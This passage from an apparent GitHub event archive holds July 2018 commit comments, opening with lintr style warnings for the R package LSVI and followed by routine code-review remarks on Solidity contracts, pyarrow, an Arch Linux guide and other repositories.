selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_soortenKenmerken.R:96:1:](https://github.com/inbo/LSVI/blob/216a301545449db5fd15a7298402fba63dc1b5b5/R/invoercontroleData_soortenKenmerken.R#L96) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    Kenmerken <- Data_soortenKenmerken #naamsverandering is omdat code verplaatst is\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_soortenKenmerken.R:109:1:](https://github.com/inbo/LSVI/blob/216a301545449db5fd15a7298402fba63dc1b5b5/R/invoercontroleData_soortenKenmerken.R#L109) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande code mag weg zodra Gert deze Canonicalname toegevoegd heeft aan de databank\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:47:1:](https://github.com/inbo/LSVI/blob/216a301545449db5fd15a7298402fba63dc1b5b5/R/invoercontroleData_voorwaarden.R#L47) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #misschien best ook testen dat die indicator-criterium-combinatie in de databank voorkomt?  En of deze voor dat habitattype voorkomt, maar dat best verderop doen\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:48:1:](https://github.com/inbo/LSVI/blob/216a301545449db5fd15a7298402fba63dc1b5b5/R/invoercontroleData_voorwaarden.R#L48) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #Voorwaarde ook verplichten?  Anders wel testen of het ok is als het aanwezig is.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_aantal.R:116:1:](https://github.com/inbo/LSVI/blob/216a301545449db5fd15a7298402fba63dc1b5b5/R/s4_aantal.R#L116) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>setMethod(           #bij deze methode nog rekening houden met eventuele dubbels in de soortenlijst!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:40:13:](https://github.com/inbo/LSVI/blob/216a301545449db5fd15a7298402fba63dc1b5b5/R/s4_bedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:43:1:](https://github.com/inbo/LSVI/blob/216a301545449db5fd15a7298402fba63dc1b5b5/R/s4_bedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:59:7:](https://github.com/inbo/LSVI/blob/216a301545449db5fd15a7298402fba63dc1b5b5/R/s4_bedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:60:7:](https://github.com/inbo/LSVI/blob/216a301545449db5fd15a7298402fba63dc1b5b5/R/s4_bedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:40:13:](https://github.com/inbo/LSVI/blob/216a301545449db5fd15a7298402fba63dc1b5b5/R/s4_maxBedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:43:1:](https://github.com/inbo/LSVI/blob/216a301545449db5fd15a7298402fba63dc1b5b5/R/s4_maxBedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:59:7:](https://github.com/inbo/LSVI/blob/216a301545449db5fd15a7298402fba63dc1b5b5/R/s4_maxBedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:60:7:](https://github.com/inbo/LSVI/blob/216a301545449db5fd15a7298402fba63dc1b5b5/R/s4_maxBedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:40:13:](https://github.com/inbo/LSVI/blob/216a301545449db5fd15a7298402fba63dc1b5b5/R/s4_maxBedekkingExcl.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:43:1:](https://github.com/inbo/LSVI/blob/216a301545449db5fd15a7298402fba63dc1b5b5/R/s4_maxBedekkingExcl.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:59:7:](https://github.com/inbo/LSVI/blob/216a301545449db5fd15a7298402fba63dc1b5b5/R/s4_maxBedekkingExcl.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:60:7:](https://github.com/inbo/LSVI/blob/216a301545449db5fd15a7298402fba63dc1b5b5/R/s4_maxBedekkingExcl.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/selecteerKenmerkenInOpname.R:45:1:](https://github.com/inbo/LSVI/blob/216a301545449db5fd15a7298402fba63dc1b5b5/R/selecteerKenmerkenInOpname.R#L45) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/zzz.R:31:13:](https://github.com/inbo/LSVI/blob/216a301545449db5fd15a7298402fba63dc1b5b5/R/zzz.R#L31) *warning:* **no visible binding for global variable 'ConnectiePool'**\n```r\n<U+200B>  poolClose(ConnectiePool)\n            ^~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_1_databank.R:38:15:](https://github.com/inbo/LSVI/blob/216a301545449db5fd15a7298402fba63dc1b5b5/inst/tests/testthat/test_1_databank.R#L38) *style:* **Trailing whitespace is superfluous.**\n```r\n<U+200B>        ) %in% \n              ^\n```\n[inst/tests/testthat/test_1_databank.R:482:1:](https://github.com/inbo/LSVI/blob/216a301545449db5fd15a7298402fba63dc1b5b5/inst/tests/testthat/test_1_databank.R#L482) *style:* **Trailing blank lines are superfluous.**\n```r\n<U+200B>\n^\n```\n[inst/tests/testthat/test_1_databank.R:483:1:](https://github.com/inbo/LSVI/blob/216a301545449db5fd15a7298402fba63dc1b5b5/inst/tests/testthat/test_1_databank.R#L483) *style:* **Trailing blank lines are superfluous.**\n```r\n<U+200B>\n^\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:26:3:](https://github.com/inbo/LSVI/blob/216a301545449db5fd15a7298402fba63dc1b5b5/inst/tests/testthat/test_berekenLSVIbasis.R#L26) *style:* **Commented code should be removed.**\n```r\n<U+200B># save(Resultaat, file = \"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:27:3:](https://github.com/inbo/LSVI/blob/216a301545449db5fd15a7298402fba63dc1b5b5/inst/tests/testthat/test_berekenLSVIbasis.R#L27) *style:* **Commented code should be removed.**\n```r\n<U+200B># load(\"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:485:1:](https://github.com/inbo/LSVI/blob/216a301545449db5fd15a7298402fba63dc1b5b5/inst/tests/testthat/test_berekenLSVIbasis.R#L485) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen: \"Niet alle te evalueren soorten zijn opgenomen onder Data_soorten\\\\$Soort_Latijn, er wordt van uitgegaan dat de niet opgenomen soorten niet waargenomen zijn\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:486:1:](https://github.com/inbo/LSVI/blob/216a301545449db5fd15a7298402fba63dc1b5b5/inst/tests/testthat/test_berekenLSVIbasis.R#L486) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog extra tests toevoegen voor genera en habitatsubtypes als de ontwikkeling hiervoor op punt staat\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_s4_Aantal.R:189:1:](https://github.com/inbo/LSVI/blob/216a301545449db5fd15a7298402fba63dc1b5b5/inst/tests/testthat/test_s4_Aantal.R#L189) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>  #nog toevoegen als het opzoeken van soorten in subniveaus opgelost is: de aggregatie van bedekkingen gebeurt correct\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-18T08:54:19Z"}
{"id":"7981555093","type":"CommitCommentEvent","actor":{"login":"ivowillemsen"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29746135,"position":547,"line":440,"path":"contracts/RockPaperScissors.sol","commit_id":"b85afd8baf463cc123fdc46f8ca0e351edcff46c","created_at":"2018-07-18T08:55:01Z","updated_at":"2018-07-18T08:55:01Z","author_association":"OWNER","body":"hahaha"}},"created_at":"2018-07-18T08:55:01Z"}
{"id":"7981555383","type":"CommitCommentEvent","actor":{"login":"miguel-l"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29746138,"position":null,"line":null,"path":null,"commit_id":"d785c5aeb451b3c178e39b51c206901ecd97c865","created_at":"2018-07-18T08:55:05Z","updated_at":"2018-07-18T08:55:05Z","author_association":"OWNER","body":"Will also resubmit, Thanks!"}},"created_at":"2018-07-18T08:55:05Z"}
{"id":"7981556758","type":"CommitCommentEvent","actor":{"login":"Mizux"},"repo":{"name":"google/or-tools"},"payload":{"comment":{"id":29746142,"position":null,"line":null,"path":null,"commit_id":"13b8633df4374a6f48ef61d007cf0a8506cdf0d8","created_at":"2018-07-18T08:55:21Z","updated_at":"2018-07-18T08:55:21Z","author_association":"COLLABORATOR","body":"cf dotnet/cli#9319"}},"created_at":"2018-07-18T08:55:21Z"}
{"id":"7981557505","type":"CommitCommentEvent","actor":{"login":"OrionUnix"},"repo":{"name":"OrionUnix/webhooks_airdrop"},"payload":{"comment":{"id":29746143,"position":null,"line":null,"path":null,"commit_id":"790f606de3472e5e0eaf68746339dd0fac1db9ec","created_at":"2018-07-18T08:55:29Z","updated_at":"2018-07-18T08:55:29Z","author_association":"OWNER","body":"#36 Alive Casino\r\nlien : [https://t.me/AliveCasinoAirdropBot?start=396295889\r\n](https://t.me/AliveCasinoAirdropBot?start=396295889\r\n) SUivre les instructions du bot"}},"created_at":"2018-07-18T08:55:29Z"}
{"id":"7981560583","type":"CommitCommentEvent","actor":{"login":"roytam1"},"repo":{"name":"classilla/tenfourfox"},"payload":{"comment":{"id":29746151,"position":null,"line":null,"path":null,"commit_id":"b6afdab5d473e5508f9af8cf28da92b0691160a6","created_at":"2018-07-18T08:56:03Z","updated_at":"2018-07-18T08:56:03Z","author_association":"NONE","body":"and all you need is put a new #define into pkcs11n.h like this:\r\n\r\nhttps://github.com/roytam1/RetroZilla/commit/4b7c400df2e31f7516945d8c5be06705acef5166#diff-6a1ef5c56335af1ba330b50caf136c57"}},"created_at":"2018-07-18T08:56:03Z"}
{"id":"7981560780","type":"CommitCommentEvent","actor":{"login":"Morganamilo"},"repo":{"name":"ejmg/an-idiots-guide-to-installing-arch-on-a-lenovo-carbon-x1-gen-6"},"payload":{"comment":{"id":29746152,"position":8,"line":97,"path":"README.org","commit_id":"0286bf48e30c505393b38a5d60eefbccbf75e24d","created_at":"2018-07-18T08:56:05Z","updated_at":"2018-07-18T08:56:05Z","author_association":"NONE","body":"You also have seemed to just shrug Fox's warning about `-Sy` which is dangerous and you should not be recommending people to use it.\r\n\r\nAlso `archroot` is not a command. "}},"created_at":"2018-07-18T08:56:05Z"}
{"id":"7981563179","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29746158,"position":41,"line":76,"path":"contracts/Remittance.sol","commit_id":"51d066f79cc71928bc9afeb541c818de0c4bd6db","created_at":"2018-07-18T08:56:31Z","updated_at":"2018-07-18T08:56:31Z","author_association":"OWNER","body":"I also tried to cast from bytes32 to bytes when using keccak256, but I got this error:\r\n`browser/Remittance.sol:61:54: TypeError: Explicit type conversion not allowed from \"bytes32\" to \"bytes storage pointer\".`"}},"created_at":"2018-07-18T08:56:31Z"}
{"id":"7981564420","type":"CommitCommentEvent","actor":{"login":"denydias"},"repo":{"name":"futtta/ao_critcss_aas"},"payload":{"comment":{"id":29746161,"position":null,"line":null,"path":null,"commit_id":"3bec7c1393bf6400b72e96470a11dff61b21ca53","created_at":"2018-07-18T08:56:44Z","updated_at":"2018-07-18T08:56:44Z","author_association":"COLLABORATOR","body":"Do you realize that if the queue is running while the maintenance tasks is fired, the next cron schedule will run the queue twice, right? This ma cause unpredictable results. Lock files are deleted upon a successful queue run."}},"created_at":"2018-07-18T08:56:44Z"}
{"id":"7981567477","type":"CommitCommentEvent","actor":{"login":"lokesh8389"},"repo":{"name":"chaitanyaubijawe/node_js"},"payload":{"comment":{"id":29746165,"position":null,"line":null,"path":null,"commit_id":"62f39286a6b00f22e4516535d561df86d60b97a8","created_at":"2018-07-18T08:57:19Z","updated_at":"2018-07-18T08:57:19Z","author_association":"COLLABORATOR","body":"Updated"}},"created_at":"2018-07-18T08:57:19Z"}
{"id":"7981571028","type":"CommitCommentEvent","actor":{"login":"BlackScreen"},"repo":{"name":"jb-alvarado/media-autobuild_suite"},"payload":{"comment":{"id":29746175,"position":null,"line":null,"path":null,"commit_id":"f0c4ab95b02d21bb2b7abf610c5da33c8a77dc54","created_at":"2018-07-18T08:58:00Z","updated_at":"2018-07-18T08:58:00Z","author_association":"NONE","body":"Sadly, not working. [logs.zip] (https://0x0.st/sOy6.zip)\r\nAlso the option seems to be missing in the full build - choice number 4 in the ini-file."}},"created_at":"2018-07-18T08:58:00Z"}
{"id":"7981576994","type":"CommitCommentEvent","actor":{"login":"kszucs"},"repo":{"name":"apache/arrow"},"payload":{"comment":{"id":29746188,"position":60,"line":467,"path":"python/pyarrow/scalar.pxi","commit_id":"dc80a768c0a15e62998ccd32d8353d2035302cb6","created_at":"2018-07-18T08:59:07Z","updated_at":"2018-07-18T08:59:07Z","author_association":"CONTRIBUTOR","body":"I think Cython's [fast instantiation](https://cython.readthedocs.io/en/latest/src/userguide/extension_types.html?highlight=fast#fast-instantiation) causes that: `value = klass.__new__(klass)`\r\n\r\nWe might try to use `@cython.freelist` for a couple of extension classes, could result some speedup in exchange of preallocated memory."}},"created_at":"2018-07-18T08:59:07Z"}
{"id":"7981577771","type":"CommitCommentEvent","actor":{"login":"moosakhan92"},"repo":{"name":"moosakhan92/Employeemanagement"},"payload":{"comment":{"id":29746193,"position":null,"line":null,"path":null,"commit_id":"c5965d673e9758912a8ed1e082b6455d7d5459ad","created_at":"2018-07-18T08:59:15Z","updated_at":"2018-07-18T08:59:15Z","author_association":"OWNER","body":"Good job"}},"created_at":"2018-07-18T08:59:15Z"}
{"id":"7981583357","type":"CommitCommentEvent","actor":{"login":"lwhite1"},"repo":{"name":"jtablesaw/tablesaw"},"payload":{"comment":{"id":29746215,"position":null,"line":null,"path":null,"commit_id":"3c4cdd07611f11e1713421c2760189c22a28ee46","created_at":"2018-07-18T09:00:16Z","updated_at":"2018-07-18T09:00:16Z","author_association":"COLLABORATOR","body":"not yet. there will be one\r\nUser guide TOC > using tablesaw with smile > regression, "}},"created_at":"2018-07-18T09:00:16Z"}
{"id":"7981585930","type":"CommitCommentEvent","actor":{"login":"kszucs"},"repo":{"name":"apache/arrow"},"payload":{"comment":{"id":29746220,"position":60,"line":467,"path":"python/pyarrow/scalar.pxi","commit_id":"dc80a768c0a15e62998ccd32d8353d2035302cb6","created_at":"2018-07-18T09:00:41Z","updated_at":"2018-07-18T09:00:41Z","author_association":"CONTRIBUTOR","body":"@xhochy ohh, You mean decreased performance (increased time)?"}},"created_at":"2018-07-18T09:00:41Z"}
{"id":"7981594267","type":"CommitCommentEvent","actor":{"login":"carlosgkx"},"repo":{"name":"carlosgkx/First-one"},"payload":{"comment":{"id":29746241,"position":2,"line":2,"path":"README.md","commit_id":"906551049eb585977143036fcfc54f846ee55346","created_at":"2018-07-18T09:02:12Z","updated_at":"2018-07-18T09:02:12Z","author_association":"OWNER","body":"Mistake here"}},"created_at":"2018-07-18T09:02:12Z"}
{"id":"7981605338","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29746261,"position":5,"line":8,"path":"contracts/Remittance.sol","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-18T09:04:13Z","updated_at":"2018-07-18T09:04:13Z","author_association":"NONE","body":"Doing a string-match in Solidity will be very expensive. But the main idea is there, you are just one step away from doing the equivalent but dirt-cheap."}},"created_at":"2018-07-18T09:04:13Z"}
{"id":"7981606418","type":"CommitCommentEvent","actor":{"login":"futtta"},"repo":{"name":"futtta/ao_critcss_aas"},"payload":{"comment":{"id":29746265,"position":null,"line":null,"path":null,"commit_id":"3bec7c1393bf6400b72e96470a11dff61b21ca53","created_at":"2018-07-18T09:04:25Z","updated_at":"2018-07-18T09:04:25Z","author_association":"OWNER","body":"hah, but this is inside `ao_ccss_deactivation()` Deny, so there is no next cron schedule? :)"}},"created_at":"2018-07-18T09:04:25Z"}
{"id":"7981610158","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29746271,"position":79,"line":61,"path":"contracts/Remittance.sol","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-18T09:05:06Z","updated_at":"2018-07-18T09:05:06Z","author_association":"NONE","body":"What if you had a public function on the smart contract that was creating the hash for you, given the proper arguments? "}},"created_at":"2018-07-18T09:05:06Z"}
{"id":"7981610500","type":"CommitCommentEvent","actor":{"login":"seanding"},"repo":{"name":"seanding/test2"},"payload":{"comment":{"id":29746273,"position":null,"line":null,"path":null,"commit_id":"6c1b1a6793488fa340c12d579694aeee7d8e202d","created_at":"2018-07-18T09:05:10Z","updated_at":"2018-07-18T09:05:10Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-18T09:05:10Z"}
{"id":"7981611250","type":"CommitCommentEvent","actor":{"login":"seanding"},"repo":{"name":"seanding/test2"},"payload":{"comment":{"id":29746274,"position":null,"line":null,"path":null,"commit_id":"6c1b1a6793488fa340c12d579694aeee7d8e202d","created_at":"2018-07-18T09:05:17Z","updated_at":"2018-07-18T09:05:17Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-18T09:05:17Z"}
{"id":"7981612833","type":"CommitCommentEvent","actor":{"login":"leostrakosch"},"repo":{"name":"sosy-lab/benchexec"},"payload":{"comment":{"id":29746278,"position":null,"line":null,"path":null,"commit_id":"15e1dd35d7223039078b658a4e5ab86427144fe4","created_at":"2018-07-18T09:05:34Z","updated_at":"2018-07-18T09:05:34Z","author_association":"CONTRIBUTOR","body":"Yes, you had a typo: `values[-1]`**,** , making the max value a tuple."}},"created_at":"2018-07-18T09:05:34Z"}
{"id":"7981613235","type":"CommitCommentEvent","actor":{"login":"alireza110110"},"repo":{"name":"CentroEPiaggio/Open-Automated-External-Defibrillator"},"payload":{"comment":{"id":29746281,"position":null,"line":null,"path":null,"commit_id":"171a587cce55b7019b2adee6838594ea41f0ac1a","created_at":"2018-07-18T09:05:39Z","updated_at":"2018-07-18T09:05:39Z","author_association":"NONE","body":"I want to the infotmation of transformer to design and build it.please help me.tnx"}},"created_at":"2018-07-18T09:05:39Z"}
{"id":"7981618232","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"glandium/git-cinnabar"},"payload":{"comment":{"id":29746294,"position":null,"line":null,"path":null,"commit_id":"0d3f198c770c8a9b3d9bd62f4ddc96634099f467","created_at":"2018-07-18T09:06:34Z","updated_at":"2018-07-18T09:06:34Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nInterpreterError at template.tasks[0].expires: unknown context value task_for\n\n</details>"}},"created_at":"2018-07-18T09:06:34Z"}
{"id":"7981618541","type":"CommitCommentEvent","actor":{"login":"sailan"},"repo":{"name":"directman66/majordomo-yandexweather"},"payload":{"comment":{"id":29746295,"position":5,"line":635,"path":"modules/yandexweather/yandexweather.class.php","commit_id":"6dcad71903b6d251be0fb35a3c90262b688f057f","created_at":"2018-07-18T09:06:37Z","updated_at":"2018-07-18T09:06:37Z","author_association":"NONE","body":"$rec['country'] = 'Белорусь';"}},"created_at":"2018-07-18T09:06:37Z"}
{"id":"7981621275","type":"CommitCommentEvent","actor":{"login":"kszucs"},"repo":{"name":"apache/arrow"},"payload":{"comment":{"id":29746304,"position":60,"line":467,"path":"python/pyarrow/scalar.pxi","commit_id":"dc80a768c0a15e62998ccd32d8353d2035302cb6","created_at":"2018-07-18T09:07:07Z","updated_at":"2018-07-18T09:07:07Z","author_association":"CONTRIBUTOR","body":"We could expand it to a case statement and use explicit classnames instead of dict lookup. Are You checking the annotated output or should I?"}},"created_at":"2018-07-18T09:07:07Z"}
{"id":"7981623151","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29746309,"position":89,"line":70,"path":"contracts/Remittance.sol","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-18T09:07:27Z","updated_at":"2018-07-18T09:07:27Z","author_association":"NONE","body":"If the timestamp is right, the recipient can no longer retrieve the remittance. So it is just a matter of waiting for someone to claim back the payment. Anyone can say \"hey it is expired, money has to be returned to the rightful sender\". That someone is the good Samaritan. The good Samaritan is not collecting the payment, it is only triggering the correct action."}},"created_at":"2018-07-18T09:07:27Z"}
{"id":"7981625324","type":"CommitCommentEvent","actor":{"login":"denydias"},"repo":{"name":"futtta/ao_critcss_aas"},"payload":{"comment":{"id":29746322,"position":null,"line":null,"path":null,"commit_id":"3bec7c1393bf6400b72e96470a11dff61b21ca53","created_at":"2018-07-18T09:07:51Z","updated_at":"2018-07-18T09:07:51Z","author_association":"COLLABORATOR","body":"True... I read `ao_ccss_maintenance` and forgot the function."}},"created_at":"2018-07-18T09:07:51Z"}
{"id":"7981629117","type":"CommitCommentEvent","actor":{"login":"albertz"},"repo":{"name":"rwth-i6/returnn"},"payload":{"comment":{"id":29746327,"position":306,"line":598,"path":"extern/official_tf_resnet/resnet_model.py","commit_id":"f3020254755b640c60d9a20f93443cc44e04fe2c","created_at":"2018-07-18T09:08:32Z","updated_at":"2018-07-18T09:08:32Z","author_association":"MEMBER","body":"No, that was not my question. I was asking whether the behaviour is the same for  `conv_time_dim = True` and `conv_time_dim = False`. This should be the case of course, if everything is correct. The only difference should be that one is fast and the other is slow."}},"created_at":"2018-07-18T09:08:32Z"}
{"id":"7981642271","type":"CommitCommentEvent","actor":{"login":"Ranchock"},"repo":{"name":"Ranchock/First-work"},"payload":{"comment":{"id":29746370,"position":1,"line":1,"path":"README.md","commit_id":"b82d309bbaae3732f66e50606d8587f555d947dc","created_at":"2018-07-18T09:11:00Z","updated_at":"2018-07-18T09:11:00Z","author_association":"OWNER","body":"如何使用GitHub"}},"created_at":"2018-07-18T09:11:00Z"}
{"id":"7981644803","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29746380,"position":14,"line":13,"path":"test/tests.js","commit_id":"536b010e5f251f7262d2ec4bb1f317704c34876b","created_at":"2018-07-18T09:11:28Z","updated_at":"2018-07-18T09:11:28Z","author_association":"NONE","body":"It is better to say `it(\"\", function() {` because inside the `function`, you will have access to interesting things like [`this.skip()`](https://mochajs.org/#inclusive-tests) and [`this.timeout(600)`](https://mochajs.org/#suite-level)."}},"created_at":"2018-07-18T09:11:28Z"}
{"id":"7981646747","type":"CommitCommentEvent","actor":{"login":"Fantasmy"},"repo":{"name":"Fantasmy/CovalcoWebApi"},"payload":{"comment":{"id":29746386,"position":null,"line":null,"path":null,"commit_id":"14391980f5e3d339a3157e985e950725bca50d93","created_at":"2018-07-18T09:11:50Z","updated_at":"2018-07-18T09:11:50Z","author_association":"OWNER","body":"Closed wrong issue.... Now  close #5."}},"created_at":"2018-07-18T09:11:50Z"}
{"id":"7981647575","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29746387,"position":16,"line":15,"path":"test/tests.js","commit_id":"536b010e5f251f7262d2ec4bb1f317704c34876b","created_at":"2018-07-18T09:11:59Z","updated_at":"2018-07-18T09:11:59Z","author_association":"NONE","body":"`web3.eth.getBalance` is a sync' call. Can you use the promisified form?"}},"created_at":"2018-07-18T09:11:59Z"}
{"id":"7981650093","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29746388,"position":17,"line":16,"path":"test/tests.js","commit_id":"536b010e5f251f7262d2ec4bb1f317704c34876b","created_at":"2018-07-18T09:12:28Z","updated_at":"2018-07-18T09:12:28Z","author_association":"NONE","body":"If `\"There must be at least\"`, then it should be an `assert`."}},"created_at":"2018-07-18T09:12:28Z"}
